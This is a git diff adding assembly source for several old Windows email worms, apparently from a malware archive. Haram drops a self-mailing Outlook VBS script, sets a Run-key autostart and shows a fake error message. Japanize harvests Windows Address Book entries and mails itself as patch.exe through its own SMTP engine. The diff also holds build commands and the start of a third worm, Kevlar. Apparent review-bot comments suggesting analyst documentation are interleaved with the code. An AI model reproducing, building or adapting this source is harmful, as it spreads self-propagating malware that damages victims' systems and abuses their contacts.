+PROCESSENTRY32 ENDS + +start: pushad + @SEH_SetupFrame + +hide_the_worm: + call hide_worm + +get_name: + push 50 + mov esi,offset orgwrm + push esi + push 0 + api GetModuleFileNameA + +get_copy_name: + mov edi,offset cpywrm + push edi + push 50 + push edi + api GetSystemDirectoryA + add edi,eax + mov eax,'nuF\' + stosd + mov eax,'aGyn' + stosd + mov eax,'e.em' + stosd + mov eax,'ex' + stosd + pop edi + +copy_worm: + push 1 + push edi + push esi + api CopyFileA + test eax,eax + je ok_copy + + push 50 + push edi + push 1 + @pushsz "Haram" + @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" + push 80000002h + api SHSetValueA + + push 50 + push offset msgwrm + push esi + api GetFileTitleA + push 10h + push offset msgwrm + @pushsz "ERROR : this file is not a valid Win32 file." + push 0 + api MessageBoxA +ok_copy: + +call inf_doc_personal + +get_startup_path: + push 0 + push 7 + push offset startup + push 0 + api SHGetSpecialFolderPathA + push offset startup + api SetCurrentDirectoryA + +call cr_vbsname + + mov edi,offset vbsname + + push 0 + push 1 + push 2 + push 0 + push 1 + push 40000000h + push edi + api CreateFileA + mov ebp,eax + push 0 + push offset byte_write + push e_vbs - s_vbs + push offset s_vbs + push ebp + api WriteFile + push ebp + api CloseHandle + + +payload: + mov eax,offset sysTime + push eax + api GetSystemTime + lea eax,sysTime + cmp word ptr [eax+6],10 + jne end_payload + + xor eax,eax + push eax + push eax + push eax + @pushsz "set CDAudio door open" + api mciSendStringA + + push 500 + api Sleep + + xor eax,eax + push eax + push eax + push eax + @pushsz "set CDAudio door closed" + api mciSendStringA + + push 40h + @pushsz "I-Worm.Haram" + @pushsz "Coded by PetiK - 2002 - France" + push 0 + api MessageBoxA + + api GetTickCount + push 10000 + pop ecx + xor edx,edx + div ecx + inc edx + mov ecx,edx + push ecx + api Sleep + jmp payload + +end_payload: + +call inf_process + +end_worm: + @SEH_RemoveFrame + popad + push 0 + api ExitProcess + 
+hide_worm Proc + pushad + @pushsz "KERNEL32.DLL" + api GetModuleHandleA + xchg eax,ecx + jecxz end_hide_worm + @pushsz "RegisterServiceProcess" ; Registered as Service Process + push ecx + api GetProcAddress + xchg eax,ecx + jecxz end_hide_worm + push 1 + push 0 + call ecx + end_hide_worm: + popad + ret +hide_worm EndP + +Spread_Mirc Proc + push offset cpywrm + push offset mirc_exe + api lstrcpy + call @mirc + db "C:\mirc\script.ini",0 + db "C:\mirc32\script.ini",0 ; spread with mIRC. Thanx to Microsoft. + db "C:\progra~1\mirc\script.ini",0 + db "C:\progra~1\mirc32\script.ini",0 + @mirc: + pop esi + push 4 + pop ecx + mirc_loop: + push ecx + push 0 + push 80h + push 2 + push 0 + push 1 + push 40000000h + push esi + api CreateFileA + mov ebp,eax + push 0 + push offset byte_write + @tmp_mirc: + push e_mirc - s_mirc + push offset s_mirc + push ebp + api WriteFile + push ebp + api CloseHandle + @endsz + pop ecx + loop mirc_loop + end_spread_mirc: + ret +Spread_Mirc EndP + + + +inf_doc_personal Proc + pushad +get_personal_folder: + push 0 + push 5 + push offset personal + push 0 + api SHGetSpecialFolderPathA + push offset personal + api SetCurrentDirectoryA +fff_doc: + push offset ffile + @pushsz "*.doc" + api FindFirstFileA + inc eax + je end_f_doc + dec eax + mov [hfind],eax + +cr_file: + push offset ffile.cFileName + push offset new_file + api lstrcpy + mov esi,offset new_file + push esi + api lstrlen + add esi,eax + sub esi,4 ; to become \SYSTEM\Wsock32 + mov [esi],"mth." 
+ lodsd + + push 0 + push 1 + push 2 + push 0 + push 1 + push 40000000h + push offset new_file + api CreateFileA + mov ebp,eax + push 0 + push offset byte_write + push e_htm - s_htm + push offset s_htm + push ebp + api WriteFile + push ebp + api CloseHandle + +fnf_doc: + push offset ffile + push [hfind] + api FindNextFileA + test eax,eax + jne cr_file + push [hfind] + api FindClose +end_f_doc: + popad + ret +inf_doc_personal EndP + + +inf_process Proc + popad +create_folder: + push 0 + @pushsz "C:\backup" + api CreateDirectoryA + @pushsz "C:\backup" + api SetCurrentDirectoryA +enum_process: + push 0 + push 2 + api CreateToolhelp32Snapshot + mov lSnapshot,eax + inc eax + je end_inf_process + lea eax,uProcess + mov [eax.dwSize], SIZE PROCESSENTRY32 + lea eax,uProcess + push eax + push lSnapshot + api Process32First +check_process: + test eax,eax + jz end_process + push ecx + mov eax,ProcessID + push offset uProcess + cmp eax,[uProcess.th32ProcessID] + je NextProcess + lea ebx,[uProcess.szExeFile] + + push ebx + push offset new_name + api lstrcpy + mov edi,offset new_name + push edi + api lstrlen + add edi,eax + mov eax,"mth." 
+ stosd + xor eax,eax + stosd + push offset new_name + @pushsz "System.htm" + api lstrcmp + test eax,eax + jz NextProcess + + push 0 + push 1 + push 2 + push 0 + push 1 + push 40000000h + push offset new_name + api CreateFileA + mov ebp,eax + push 0 + push offset byte_write + push e_htm - s_htm + push offset s_htm + push ebp + api WriteFile + push ebp + api CloseHandle + +NextProcess: + push offset uProcess + push lSnapshot + api Process32Next + jmp check_process +end_process: + push lSnapshot + api CloseHandle +end_inf_process: + pushad + ret +inf_process EndP + + +cr_vbsname Proc + mov edi,offset vbsname +; api GetTickCount + push 10 + pop ecx +; xor edx,edx +; div ecx +; inc edx +; mov ecx,edx + name_g: + push ecx + api GetTickCount + push '9'-'0' + pop ecx + xor edx,edx + div ecx + xchg eax,edx + add al,'0' + stosb + api GetTickCount + push 100 + pop ecx + xor edx,edx + div ecx + push edx + api Sleep + pop ecx + loop name_g + mov eax,"sbv." + stosd + ret +cr_vbsname EndP + + + +.data +ffile WIN32_FIND_DATA +sysTime db 16 dup(0) + +uProcess PROCESSENTRY32 +ProcessID dd ? +lSnapshot dd ? +new_name db 100 dup (?) + +orgwrm db 50 dup (0) +cpywrm db 50 dup (0) +msgwrm db 50 dup (0) +startup db 70 dup (0) +personal db 70 dup (0) +new_file db 90 dup (0) +vbsname db 20 dup (0) +byte_write dd ? +hfind dd ? + +s_mirc: db "[script]",CRLF + db ";Don't edit this file.",CRLF,CRLF + db "n0=on 1:JOIN:{",CRLF + db "n1= /if ( $nick == $me ) { halt }",CRLF + db "n2= /.dcc send $nick " +mirc_exe db 50 dup (?) 
+ db CRLF,"n3=}",0 +e_mirc: + + +s_htm: db '',CRLF + db 'Windows Media Player',CRLF + db '',0 +e_htm: + +s_vbs: db 'On Error Resume Next',CRLF + db 'Set terqne = CreateObject("Scripting.FileSystemObject")',CRLF + db 'Set qumhzh = CreateObject("WScript.Shell")',CRLF + db 'Set sys = terqne.GetSpecialFolder(1)',CRLF + db 'copyname = sys&"\FunnyGame.exe"',CRLF + db 'Set htgx = CreateObject("Outlook.Application")',CRLF + db 'Set ofcc = htgx.GetNameSpace("MAPI")',CRLF + db 'For each c In ofcc.AddressLists',CRLF + db 'If c.AddressEntries.Count <> 0 Then',CRLF + db 'For d = 1 To c.AddressEntries.Count',CRLF + db 'Set etldb = htgx.CreateItem(0)',CRLF + db 'etldb.To = c.AddressEntries(d).Address',CRLF + db 'etldb.Subject = "New game from the net for you " & c.AddressEntries(d).Name',CRLF + db 'etldb.Body = "Play at this funny game. It''s very cool !"',CRLF + db 'etldb.Attachments.Add(copyname)',CRLF + db 'etldb.DeleteAfterSubmit = True',CRLF + db 'If etldb.To <> "" Then',CRLF + db 'etldb.Send',CRLF + db 'End If',CRLF + db 'Next',CRLF + db 'End If',CRLF + db 'Next',0 +e_vbs: + +ends +end start + +************************************************************************* + +@tasm32 /M /ML haram.asm +@tlink32 -Tpe -aa -c -x haram.obj,,,import32,haram.def +rem pause +rem upx -9 haram.exe +@del *.obj +rem pause + +************************************************************************* + +IMPORTS + +SHLWAPI.SHSetValueA +SHELL32.SHGetSpecialFolderPathA \ No newline at end of file diff --git a/Win32/I-Worm.Japanize.asm b/Win32/I-Worm.Japanize.asm new file mode 100644 index 00000000..b1bf8c01 --- /dev/null +++ b/Win32/I-Worm.Japanize.asm 
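Review bot: The "Comments" block in the file header leaves out the persistence that copy_worm actually installs: when CopyFileA succeeds (the `je ok_copy` only skips on a zero return), SHSetValueA writes the value `Haram` under HKLM (80000002h) `Software\Microsoft\Windows\CurrentVersion\Run` pointing at the %sysdir%\FunnyGame.exe copy, and a MessageBox then shows the fake `ERROR : this file is not a valid Win32 file.` text. Anyone writing cleanup or detection notes from this source will miss that, so add a line such as `- Persistence: HKLM\...\CurrentVersion\Run\Haram = %sysdir%\FunnyGame.exe (set after a successful copy); displays a fake "not a valid Win32 file" error` to the header. Also worth recording that Spread_Mirc (writing script.ini under C:\mirc, C:\mirc32, C:\progra~1\mirc and C:\progra~1\mirc32) is defined but, as far as the visible code goes, never called from start, so those paths and the `[script]` block are strings present in the binary rather than observed runtime behaviour; a one-line `; not reached from start` on the proc would keep analysts from listing them as behaviour.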
@@ -0,0 +1,857 @@ +;;; XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX +;;; I-Worm.Japanize +;;; XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX +;;; +;;; +;;; This has some bugs. +;;; +;;; Here TrendMicro description: +;;; ****************************************************************** +;;; http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=WORM_FBOUND.B&VSect=T +;;; Details: +;;;The details of the email this worm arrives with may be as follows: +;;; +;;;To: +;;;Subject: <"Important" or random Japanese text(applicable on Japanese supported platforms)> +;;;Message Body: +;;;Attachment: patch.exe +;;; +;;;It uses its own SMTP engine and uses the following registry key to retrieve the default SMTP server of the infected system: +;;;HKEY_CURRENT_USER\Software\Microsoft\ +;;;Internet Account Manager\Accounts\00000001 +;;; +;;;It uses the following registry key to retrieve email addresses from the infected user's Windows Address Book (WAB): +;;;HKEY_CURRENT_USER\Software\Microsoft\WAB\ +;;;WAB4Wab File Name = gh +;;; +;;;The email arrives with the attachment PATCH.EXE. If the email address of its target ;;;user ends with the extension .jp, the worm randomly selects a phrase, from a list of 17 possible Japanese phrases below, and uses one as the subject of the email: +;;; +;;; +;;;The English translation for the above Japanese text are as follows: +;;;Re: the issue that you mentioned +;;;Re: important +;;;Re: long time no see +;;;Re: top secret +;;;Re: Hello +;;;Re: important information +;;;Re: data +;;;the issue that you mentioned +;;;important +;;;long time no see +;;;top secret +;;;hello +;;;important information +;;;data +;;;frog +;;;shit +;;;shit +;;; +;;;Otherwise, it uses the subject gImportant." +;;; +;;;This non-destructive worm does not drop files or create any registry entries. Its propagation depends on the execution of the file attachment in the email. 
+;;; +;;;The following text strings are found in the worm body: +;;; +;;;eXXXXXXXXXXXXXXXXXXXXXXXf +;;;eXXXXX I-Worm.Japanize XXXXXf +;;;eXXXXXXXXXXXXXXXXXXXXXXXf +;;; +;;; + + .586p + .model flat + locals + jumps + + +;;; some lazy shit +callW macro @@@x + extrn @@@x:proc + call @@@x +endm + +ofs equ offset + +dwo equ dword ptr +wo equ word ptr +by equ byte ptr + +HKEY_CURRENT_USER EQU 80000001h +CRLF equ <13,10> +rdtsc equ +AF_INET equ 2 +SOCK_STREAM equ 1 + +FILE_ATTRIBUTE_NORMAL EQU 00000080h +GENERIC_READ EQU 80000000h +GENERIC_WRITE EQU 40000000h +PAGE_READONLY EQU 00000002h +PAGE_READWRITE EQU 00000004h +FILE_MAP_READ EQU 00000004h +OPEN_EXISTING EQU 00000003h +GHND EQU 042h +FILE_SHARE_READ EQU 00000001h +FILE_SHARE_WRITE EQU 00000002h + + +;;; ---------------------------------------------------------------- + .data +hReg dd ?; registry handle +str_SMInternetAccountManager db 'Software\Microsoft\Internet Account Manager',0 +str_SMIAccounts db 'Software\Microsoft\Internet Account Manager\Accounts\' +AccountIdx db 9 dup(?); account index +bufsiz_accountidx dd 9; size + +str_DMA db 'Default Mail Account',0 +str_SMTPNAME db 'SMTP Server',0 +str_SMTPEmailAddr db 'SMTP Email Address',0 +str_SMWab4 db 'Software\Microsoft\WAB\WAB4\Wab File Name',0 + + +SMTP_Server db 50 dup(?) ; default smtp server +bufsiz_SMTPSERVER dd 50 +morons_Mailaddr db 256 dup(?) ; mail address of moron :) +bufsiz_morons_mailaddr dd 256 +wab4_path db 260 dup(?); wab file path +bufsiz_wab4_path dd 260 + +buffer db 1000 dup(?) + +hwab4file dd ? ; wab4 file handle +hwab4map dd ? ; +hwab4mapview dd ? ; + +myfilename db 260 dup(?) ; handle of myself +hmyfile dd ? +fsize dd ? ; file size + +hmemout0 dd ? +ptr_myself dd ? +hmemout dd ? ; globalalloc +ptr_base64buf dd ? ; globallock + +target_mailaddr db 48h dup(?) ; + +sockaddr_in label byte ; + sin_family dw ? + sin_port dw ? + sin_addr dd ? + sin_zero db 8 dup(?) +len_sockaddr_in = $ - ofs sockaddr_in + +sock dd ? 
; socket descriptor + +recv_buffer db 1024 dup(?) ; recv buffer + +jflag dd 0 ; japanese or not + +smtp_HELO db 'HELO localhost',CRLF +len_smtp_HELO = $ - ofs smtp_HELO +smtp_MAIL_FROM db 'MAIL FROM: ' +len_smtp_MAIL_FROM = $ - ofs smtp_MAIL_FROM +;crlf +smtp_RCPT_TO db 'RCPT TO: ' +len_smtp_RCPT_TO = $ - ofs smtp_RCPT_TO +;crlf +smtp_DATA db 'DATA',CRLF +len_smtp_DATA = $ - ofs smtp_DATA +smtp_BODY_FROM db 'FROM: ' +len_smtp_BODY_FROM = $ - ofs smtp_BODY_FROM +smtp_BODY_TO db CRLF,'TO: ' +len_smtp_BODY_TO = $ - ofs smtp_BODY_TO +smtp_BODY_SUBJECT db CRLF,'SUBJECT: Important',CRLF +len_smtp_BODY_SUBJECT = $ - ofs smtp_BODY_SUBJECT + +smtp_DOT_CRLF db '.',CRLF +len_smtp_DOT_CRLF = $ - ofs smtp_DOT_CRLF +smtp_QUIT db 'QUIT',CRLF +len_smtp_QUIT = $ - ofs smtp_QUIT + +smtp_crlf db CRLF + +smtp_MIME_h db 'MIME-Version: 1.0',CRLF + db 'Content-Type: multipart/mixed; boundary="Boundary-a8dfidaoRadvfuck"',CRLF + db CRLF + db '--Boundary-a8dfidaoRadvfuck',CRLF + db 'Content-Type: text/plain; charset=iso-2022-jp',CRLF + db 'Content-Transfer-Encoding: 7bit',CRLF + db 'Content-Description: Mail message body',CRLF + db CRLF + db CRLF ; text + db CRLF + db '--Boundary-a8dfidaoRadvfuck',CRLF + db 'Content-Type: application/x-msdownload; name="patch.exe"',CRLF + db 'Content-Disposition: attachment; filename="patch.exe"',CRLF + db 'Content-Transfer-Encoding: BASE64',CRLF + db CRLF +len_smtp_MIME_h = $ - ofs smtp_MIME_h + ;; base64 body +smtp_MIME_e db CRLF,'--Boundary-a8dfidaoRadvfuck--',CRLF,CRLF +len_smtp_MIME_e = $ - ofs smtp_MIME_e + +r_seed dd 10987293h ; random seed + + +smtp_jsubject_1 db CRLF,'SUBJECT: =?ISO-2022-JP?B?' 
+len_smtp_jsubject_1 = $ - ofs smtp_jsubject_1 +smtp_jsubject_2 db '?=',CRLF +len_smtp_jsubject_2 = $ - ofs smtp_jsubject_2 + + +;;; japanese subjects table +japanese_subjects label byte + dd ofs js_01 + dd ofs js_02 + dd ofs js_03 + dd ofs js_04 + dd ofs js_05 + dd ofs js_06 + dd ofs js_07 + dd ofs js_08 + dd ofs js_09 + dd ofs js_10 + dd ofs js_11 + dd ofs js_12 + dd ofs js_13 + dd ofs js_14 + dd ofs js_15 + dd ofs js_16 + dd ofs js_17 +num_of_jsub = ($ - ofs japanese_subjects)/4 +js_01 db 'GyRCPUVNVxsoQg==',0 ; dv +js_02 db 'UmU6GyRCPUVNVxsoQg==',0; Re:dv +js_03 db 'GyRCPUVNVyRKJCpDTiRpJDsbKEI=',0; dvȂm点 +js_04 db 'UmU6GyRCPUVNVyRKJCpDTiRpJDsbKEI=',0; Re:dvȂ点 +js_05 db 'GyRCTmMkTjdvGyhC',0 ; ̌ +js_06 db 'UmU6GyRCTmMkTjdvGyhC',0; Re:̌ +js_07 db 'GyRCJCo1VyQ3JFYkaiRHJDkbKEI=',0; vԂł +js_08 db 'UmU6GyRCJCo1VyQ3JFYkaiRHJDkbKEI=',0; Re:vԂł +js_09 db 'GyRCJDMkcyRLJEEkTxsoQg==',0; ɂ +js_10 db 'UmU6GyRCJDMkcyRLJEEkTxsoQg==',0; Re:ɂ +js_11 db 'GyRCNktIaxsoQg==',0 ; ɔ +js_12 db 'UmU6GyRCNktIaxsoQg==',0; Re:ɔ +js_13 db 'GyRCO3FOQRsoQg==',0 ; +js_14 db 'UmU6GyRCO3FOQRsoQg==',0; Re: +js_15 db 'GyRCMz8bKEI=',0 ; +js_16 db 'GyRCJSYlYxsoQlI=',0 ; E\R +js_17 db 'GyRCJCYkcyQzGyhC',0 ; + + .code +start: + callW GetTickCount + mov dwo [r_seed],eax + jmp @@go + ;; signature :) + db 'XXXXXXXXXXXXXXXXXXXXXXXXXXX',0 + db 'XXXXX I-Worm.Japanize XXXXX',0 + db 'XXXXXXXXXXXXXXXXXXXXXXXXXXX',0 + @@go: + call get_some_info + + push ofs buffer + push 0101h + callW WSAStartup + test eax,eax + jnz exit + + call open_wab + test eax,eax + jnz clean_sock + + call create_base64enc + + call spread + +free_mem: + push dwo [ptr_base64buf] + callW GlobalUnlock + push dwo [hmemout] + callW GlobalFree + +close_wab4: + push dwo [hwab4file] + push dwo [hwab4map] + push dwo [hwab4mapview] + callW CloseHandle + callW CloseHandle + callW CloseHandle + +clean_sock: + callW WSACleanup + +exit: + push 0 + callW ExitProcess + + + +spread: + ;; lifewire ;) + mov esi,dwo [hwab4mapview] + mov ecx,[esi+64h] ; num of 
addr + jecxz @@exit + add esi,[esi+60h] ; ptr to addr + + @@spread_loop: + push ecx + + mov eax,esi + cmp by [esi+1],0 + jne @@nounicode + push esi + lea edi,target_mailaddr + push edi + + push 48h + pop ecx + @@1: + lodsw + stosb + loop @@1 + + pop eax + pop esi + add esi,20h + + @@nounicode: + call spread2 + + add esi,24h + pop ecx + loop @@spread_loop + + @@exit: + ret + + +spread2: + push esi + mov esi,eax ; now esi=email addr + + push 0 + push 1 + push 2 + callW socket + mov dwo [sock],eax + + mov wo [sin_family],AF_INET + mov ax,25 + xchg al,ah + mov wo [sin_port],ax + + push ofs SMTP_Server + callW gethostbyname + test eax,eax + jz @@exit + + mov eax,[eax+12] + mov eax,[eax] + mov eax,[eax] + + mov dwo [sin_addr],eax + push len_sockaddr_in + lea eax,sockaddr_in + push eax + push dwo [sock] + callW connect + test eax,eax + jnz @@exit + + call sendmail + + @@exit: + pop esi + ret + + +;;; --- +;;; reg stuff +get_some_info: + xor ebx,ebx + + push ofs hReg + push 1 + push ebx + push ofs str_SMInternetAccountManager + push HKEY_CURRENT_USER + callW RegOpenKeyExA + test eax,eax + jnz @@error + + push ofs bufsiz_accountidx + push ofs AccountIdx + push ebx + push ebx + push ofs str_DMA + push dwo [hReg] + callW RegQueryValueExA + test eax,eax + jnz @@error + + push dwo [hReg] + callW RegCloseKey + + push ofs hReg + push 1 + push ebx + push ofs str_SMIAccounts + push HKEY_CURRENT_USER + callW RegOpenKeyExA + test eax,eax + jnz @@error + + push ofs bufsiz_SMTPSERVER + push ofs SMTP_Server + push ebx + push ebx + push ofs str_SMTPNAME + push dwo [hReg] + callW RegQueryValueExA + test eax,eax + jnz @@error + + push ofs bufsiz_morons_mailaddr + push ofs morons_Mailaddr + push ebx + push ebx + push ofs str_SMTPEmailAddr + push dwo [hReg] + callW RegQueryValueExA + test eax,eax + jnz @@error + + push dwo [hReg] + callW RegCloseKey + + push ofs hReg + push 1 + push ebx + push ofs str_SMWab4 + push HKEY_CURRENT_USER + callW RegOpenKeyExA + test eax,eax + jnz @@error + + push 
ofs bufsiz_wab4_path + push ofs wab4_path + push ebx + push ebx + push ebx + push dwo [hReg] + callW RegQueryValueExA + test eax,eax + jnz @@error + + push dwo [hReg] + callW RegCloseKey + xor eax,eax + ret + @@error: + xor eax,eax + dec eax + ret + + +open_wab: + xor ebx,ebx + push ebx + push FILE_ATTRIBUTE_NORMAL + push OPEN_EXISTING + push ebx + push FILE_SHARE_WRITE + push GENERIC_READ + push ofs wab4_path + callW CreateFileA + inc eax + jz @@error + dec eax + mov dwo [hwab4file],eax + + push ebx + push ebx + push ebx + push PAGE_READONLY + push ebx + push eax + callW CreateFileMappingA + mov dwo [hwab4map],eax + + push ebx + push ebx + push ebx + push FILE_MAP_READ + push eax + callW MapViewOfFile + mov dwo [hwab4mapview],eax + xor eax,eax + ret + @@error: + xor eax,eax + dec eax + ret + +create_base64enc: + push 260 + push ofs myfilename + push 0 + callW GetModuleFileNameA + + xor ebx,ebx + push ebx + push FILE_ATTRIBUTE_NORMAL + push OPEN_EXISTING + push ebx + push FILE_SHARE_READ + push GENERIC_READ + push ofs myfilename + callW CreateFileA + inc eax + jz @@error + dec eax + mov dwo [hmyfile],eax + + push 0 + push dwo [hmyfile] + callW GetFileSize + mov dwo [fsize],eax + + add eax,100h + push eax + push GHND + callW GlobalAlloc + mov dwo [hmemout0],eax + + push eax + callW GlobalLock + mov dwo [ptr_myself],eax + + push 0 + push ofs recv_buffer + push dwo [fsize] + push eax + push dwo [hmyfile] + callW ReadFile + test eax,eax + jz @@eexit + + push 0 + push dwo [hmyfile] + callW GetFileSize + push eax ; save size + + shl eax,1 ; eax*2 + + push eax + push GHND + callW GlobalAlloc + mov dwo [hmemout],eax + + push eax + callW GlobalLock + mov dwo [ptr_base64buf],eax + +; pop ebx ; restore size +; push ebx ; size + push eax + push dwo [ptr_myself] + call base64encode + + + push dwo [hmyfile] + callW CloseHandle + + push dwo [ptr_myself] + callW GlobalUnlock + push dwo [hmemout0] + callW GlobalFree + + xor eax,eax + ret + + @@eexit: + push dwo [hmyfile] + callW 
CloseHandle + + push dwo [ptr_myself] + callW GlobalUnlock + push dwo [hmemout0] + callW GlobalFree + + @@error: + xor eax,eax + dec eax + ret + +base64encode proc pascal + arg @@src + arg @@dest + arg @@srclen + + mov esi,dwo [@@src] + mov edi,dwo [@@dest] + + @@b64loop: + xor eax,eax + cmp dwo [@@srclen],1 + jne @@srclen2 + lodsb + push 2 + pop ecx + mov edx,03D3Dh ; == + dec dwo [@@srclen] + jmp @@b64next + + @@srclen2: + cmp dwo [@@srclen],2 + jne @@srclen3 + lodsw + push 3 + pop ecx + push 03dh + pop edx + sub dwo [@@srclen],2 + jmp @@b64next + @@srclen3: + lodsd + push 4 + pop ecx + xor edx,edx + dec esi + sub dwo [@@srclen],3 + + @@b64next: + bswap eax + + @@b64n_loop: + mov ebx,eax + and eax,0FC000000h + rol eax,6 + mov al,[@@b64table + eax] + stosb + mov eax,ebx + shl eax,6 + dec ecx + jnz @@b64n_loop + + cmp dwo [@@srclen],0 + ja @@b64loop + + mov eax,edx + stosd + ret + + @@b64table db "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" + endp + + +g_send: + ;; in + ;; ecx = size + ;; esi = ptr to data + ;; out + ;; eax = ret value of send() + push 0 + push ecx + push esi + push dwo [sock] + callW send + ret + +g_recv: + ;; out + ;; error -> eax=-1 success -> eax = 0 + @@again: + push 0 + push 1024 + push ofs recv_buffer + push dwo [sock] + callW recv + inc eax + jz @@recv_error + cmp eax,1024 + jz @@again + xor eax,eax + ret + @@recv_error: + xor eax,eax + dec eax + ret + + +sendmail: + ;; yea. 
lame routine ;) + push esi ; mail addr + mov dwo [jflag],0 ; flag for .jp + ;; + call g_recv + + ;; + lea esi,smtp_HELO + mov ecx,len_smtp_HELO + call g_send + + call g_recv + + ;; + lea esi,smtp_MAIL_FROM + mov ecx,len_smtp_MAIL_FROM + call g_send + + push ofs morons_Mailaddr + callW lstrlen + mov ecx,eax + lea esi,morons_Mailaddr + call g_send + mov ecx,2 + lea esi,smtp_crlf + call g_send + + call g_recv + ;; + mov ecx,len_smtp_RCPT_TO + lea esi,smtp_RCPT_TO + call g_send + + pop esi + push esi + + push esi + callW lstrlen + push eax ; save + mov ecx,eax + call g_send + + mov ecx,2 + lea esi,smtp_crlf + call g_send + + call g_recv + + ;; .jp? + pop eax ; len of mail address + pop esi + push esi ; mail address + add esi,eax + sub esi,3 + cmp dwo [esi],00706a2eh ; .jp? + jne @@1 + inc dwo [jflag] + @@1: + ;; + + lea esi,smtp_DATA + mov ecx,len_smtp_DATA + call g_send + + call g_recv + ;; + + lea esi,smtp_BODY_FROM + mov ecx,len_smtp_BODY_FROM + call g_send + + push ofs morons_Mailaddr + callW lstrlen + mov ecx,eax + lea esi,morons_Mailaddr + call g_send + + lea esi,smtp_BODY_TO + mov ecx,len_smtp_BODY_TO + call g_send + + pop esi + push esi + + push esi + callW lstrlen + mov ecx,eax + call g_send + + cmp dwo [jflag],0 + jnz @@jsubject + + mov ecx,len_smtp_BODY_SUBJECT + lea esi,smtp_BODY_SUBJECT + call g_send + jmp @@body + + @@jsubject: + ;; gen subject + mov ecx,len_smtp_jsubject_1 + lea esi,smtp_jsubject_1 + call g_send + + mov esi,(num_of_jsub-1) + call rng + lea esi,japanese_subjects + mov esi,dwo [esi+eax*4] + push esi + callW lstrlen + mov ecx,eax + call g_send + + mov ecx,len_smtp_jsubject_2 + lea esi,smtp_jsubject_2 + call g_send + + + + @@body: + lea esi,smtp_MIME_h + mov ecx,len_smtp_MIME_h + call g_send + + mov esi,dwo [ptr_base64buf] + push esi + push esi + callW lstrlen + pop esi + mov ecx,eax + call g_send + + lea esi,smtp_MIME_e + mov ecx,len_smtp_MIME_e + call g_send + + + mov ecx,len_smtp_DOT_CRLF + lea esi,smtp_DOT_CRLF + call g_send + + call 
g_recv + ;; + + mov ecx,len_smtp_QUIT + lea esi,smtp_QUIT + call g_send + + call g_recv + pop esi + + ret + + +rng: + ;; in + ;; esi = range + ;; out + ;; eax = random number + rdtsc + xor eax,edx + imul eax,dwo [r_seed] + dec eax + mov dwo [r_seed],eax + xor edx,edx + div esi + mov eax,edx + ret + +end start + +************************************************************************* + +@ECHO OFF +TASM32 /ml /m /z japanize.asm,japanize.obj +TLINK32 -x -aa -Tpe japanize.obj,,,%import32.lib +DEL *.OBJ diff --git a/Win32/I-Worm.Kevlar.asm b/Win32/I-Worm.Kevlar.asm new file mode 100644 index 00000000..5a5b3ff1 --- /dev/null +++ b/Win32/I-Worm.Kevlar.asm 
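Review bot: The inline comments next to js_01..js_17 that were meant to show the decoded Japanese subjects are mojibake in the committed file, so they no longer document anything; since the header already carries the 17 English translations in the same order, either replace each comment with its English line (e.g. `; Re: important` on js_02) or drop them and add `; decoded subjects: see translation list in header` above the table. The header would also be more useful to analysts if it listed the fixed protocol artifacts that sit in the data section below it — the `HELO localhost` greeting, the `SUBJECT: Important` / `=?ISO-2022-JP?B?` subject forms, the MIME boundary `Boundary-a8dfidaoRadvfuck` and the `patch.exe` attachment name — as they are constant across every message this code sends. The `;;; This has some bugs.` line is presumably the author's own caveat; noting which routines it refers to would help, but that cannot be inferred from the listing alone.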
@@ -0,0 +1,651 @@ +comment # +Name : I-Worm.Kevlar +Author : PetiK +Date : August 7th 2001 - August 16th 2001 +Size : 5120 byte + +Action : Copy itself to %System%\Kevlar32.exe hidden attribute + %System%\MScfg32.exe normal attribute + Add HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kevlar32 = %System%\Kevlar32.exe + + * Infect %Windir%\C???????.exe file on writing as "PetiK" in the file + * Infect %Windir%\*.exe It add .htm and create a new file with ActiveX + * Create C:\__.vbs This filetake all address in th e Address Book at save them in the + %windir%\AddBook.txt. The worm scan this file to find the address and send a new mail : + + Subject : Windows Protect !! + Body : The smallest software to stop your computer to bug in each time. + I have found this program on WWW.KEVLAR-PROTECT.COM + + Take a look at the attchment. + + Bye and have a nice day. + + Attachment : MScfg32.exe + + * It creates the %windir%\MSinfo32.txt. I look like this : + + [File Infected] => Name of C???????.exe file infected + CLEANMGR.EXE=Infected by W32.Kevlar.PetiK + CVTAPLOG.EXE=Infected by W32.Kevlar.PetiK + + [EMail saved] => Some address found in the address book + first@mail.com=Next victim + second@mail.com=Next victim + + +To build the worm: +tasm32 /M /ML Kevlar +tlink32 -Tpe -aa -x Kevlar,,,import32 +upx -9 Kevlar.exe + +To delete the worm: +@echo off +del %windir%\system\Kevlar32.exe +del %windir%\system\MScfg32.exe +del %windir%\*.exe.htm +del %windir%\MSinfo32.txt +del %windir%\AddBook.txt + +# + +.586p +.model flat +.code + +JUMPS + +callx macro a +extrn a:proc +call a +endm + +include useful.inc + +DEBUT: +F_NAME: push 50 + mov esi,offset Orig + push esi + push 0 + callx GetModuleFileNameA + + mov edi,offset CopyName2 + push edi + push 50 + push edi + callx GetSystemDirectoryA + add edi,eax + mov eax,'cSM\' + stosd + mov eax,'23gf' + stosd + mov eax,'exe.' 
+ stosd + pop edi + push 0 + push edi + push esi + callx CopyFileA + + mov edi,offset CopyName + push edi + push 50 + push edi + callx GetSystemDirectoryA + add edi,eax + mov al,'\' + stosb + mov eax,'lveK' + stosd + mov eax,'23ra' + stosd + mov eax,'exe.' + stosd + pop edi + + push esi + callx GetFileAttributesA + cmp eax,1 + je SUITE + + push 0 + push edi + push esi + callx CopyFileA + + push 01h + push edi + callx SetFileAttributesA + + +REG: pushad + @pushsz "SHLWAPI.dll" + callx LoadLibraryA + test eax,eax + jz FIN + mov edi,eax + @pushsz "SHSetValueA" + push edi + callx GetProcAddress + test eax,eax + jz FIN + mov esi,eax + push 08h + push offset CopyName + push 01h + @pushsz "Kevlar32" + @pushsz "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" + push 80000002h + call esi + push edi + callx FreeLibrary + popad + + call Nick + + mov edi,offset nickname + push 40h + @pushsz "Hello, my name is :" + push edi + push 0 + callx MessageBoxA + + call Infect + + jmp FIN + +SUITE: call Infect2 